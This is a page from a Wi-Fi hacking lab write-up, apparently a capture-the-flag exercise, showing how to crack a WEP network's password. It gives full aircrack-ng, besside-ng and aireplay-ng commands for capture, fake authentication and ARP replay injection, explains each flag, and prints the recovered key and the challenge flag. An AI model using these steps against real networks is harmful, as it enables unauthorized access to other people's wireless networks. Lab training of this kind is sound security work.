Wifi-hacking
  • Wifi - Hacking Lab
  • Recon
  • OPN
  • WEP
  • PSK - WPA2
  • SAE WPA3
  • MGT Recon
  • MGT
  • WIDS - Nzyme
  • Bluetooth
    • Resources
    • Tutorials
    • Reconnaisance
Powered by GitBook
On this page

WEP

How to hack WEP wifi Passwords

PreviousOPNNextPSK - WPA2

Last updated 1 month ago

07. Get wifi-old password

Get wifi-old password. FLAG: Pass in hex

In the following screenshot we can see how the AP has a client connected with traffic.

sudo airodump-ng wlan0mon --manufacturer --wps -c 3

The network is a WEP with a client, so we can use besside-ng to get the password automatically.

airmon-ng check kill
sudo besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v

1. sudo (Run as Root)

  • besside-ng requires root privileges to access wireless interfaces, so sudo is needed.

2. besside-ng (Automated WEP/WPA Attack Tool)

  • A tool that automatically captures handshakes for WPA/WPA2 networks and cracks WEP encryption.

3. -c 3 (Target Channel 3)

  • This forces besside-ng to only scan and attack Wi-Fi networks on channel 3.

  • Useful for faster attack execution instead of scanning all channels.

4. -b F0:9F:C2:71:22:11 (Target Specific BSSID)

  • F0:9F:C2:71:22:11 is the BSSID (MAC address of the target router/AP).

  • Ensures besside-ng attacks only this specific access point rather than scanning for all available networks.

5. wlan2 (Wireless Interface)

  • Specifies that wlan2 is the wireless adapter being used.

6. -v (Verbose Mode)

  • Enables detailed output for better tracking of the attack progress.

11:bb:33:cd:55

Alternate Method

In case we want to do it manually:

There is a client active on this WEP network. This makes it easier to capture enough data to crack the password.

Capture data into a file, this file is input for aircrack-ng to crack the password.

sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w wifi-old wlan0mon

To generate some extra data to the AP we can launch a fake authentication to the AP (at the same time)

sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon

1. sudo (Run as Root)

  • Required because aireplay-ng needs administrative privileges to interact with the network card.

2. aireplay-ng (Packet Injection Tool)

  • Part of the Aircrack-ng suite, used to inject packets into a wireless network.

3. -1 (Fake Authentication Mode)

  • Used to authenticate with a WEP-protected access point (AP).

  • Needed when the AP requires client authentication before allowing traffic.

4. 3600 (Keep Connection for 3600 Seconds)

  • Sets the fake authentication timeout to 3600 seconds (1 hour).

  • Ensures the attack stays authenticated for a longer period.

5. -q 10 (Quiet Mode, Sends Authentication Every 10 Seconds)

  • Sends keep-alive authentication requests every 10 seconds to stay connected.

  • Prevents the AP from disconnecting the fake client.

6. -a F0:9F:C2:71:22:11 (Target BSSID)

  • Specifies the MAC address of the target access point (AP).

7. wlan0mon (Monitor Mode Interface)

  • The wireless interface in monitor mode (previously enabled using airmon-ng).

And generate some traffic by launching an ARP-request replay attack (at the same time)

sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon

1. sudo (Run as Root)

  • Executes the command with root privileges, which is necessary for packet injection and monitoring.

2. aireplay-ng (Packet Injection Tool)

  • Part of the Aircrack-ng suite, this tool is used to inject packets into the wireless network.

3. --arpreplay (ARP Replay Attack)

  • This option injects captured ARP (Address Resolution Protocol) packets into the network.

  • The goal is to force the target access point (AP) to generate more initialization vectors (IVs).

  • The injected ARP packets trigger responses from the AP, which helps in speeding up the process of collecting enough IVs to crack WEP encryption.

4. -b F0:9F:C2:71:22:11 (Target BSSID)

  • The BSSID (MAC address) of the target access point (AP). This is the AP that you are attacking, and you want to inject ARP packets towards this specific AP.

5. -h 02:00:00:00:00:00 (Source MAC Address)

  • The source MAC address you are using in the attack.

  • It represents the fake client MAC address. If the AP checks for authentication, this address should either match a legitimate client’s MAC or be a spoofed MAC address to bypass security.

6. wlan0mon (Monitor Mode Interface)

  • The monitor mode interface used to perform the attack. This interface allows you to capture and inject packets on the network. Make sure wlan0mon is in monitor mode (you can verify this with iwconfig).

While this is running we could try crack the password Crack the password with the data captured in a command earlier. (at the same time)

sudo aircrack-ng wifi-old-01.cap

Once we have the password we can connect to the WEP network:

Create a configuration file to connect to the WEP network.

nano wep.conf

The content should look like this.

network={
  ssid="wifi-old"
  key_mgmt=NONE
  wep_key0=11BB33CD55
  wep_tx_keyidx=0
}

Now we can connect to the WEP network with our configuration file.

sudo wpa_supplicant -D nl80211 -i wlan2 -c wep.conf

We should try to retrieve an IP address from the DHCP server.

sudo dhclient wlan2 -v

And now we can access http://192.168.1.1 to verify that we are connected.

flag{c342fe657870020a1b164f2075f447564fdd1c3d}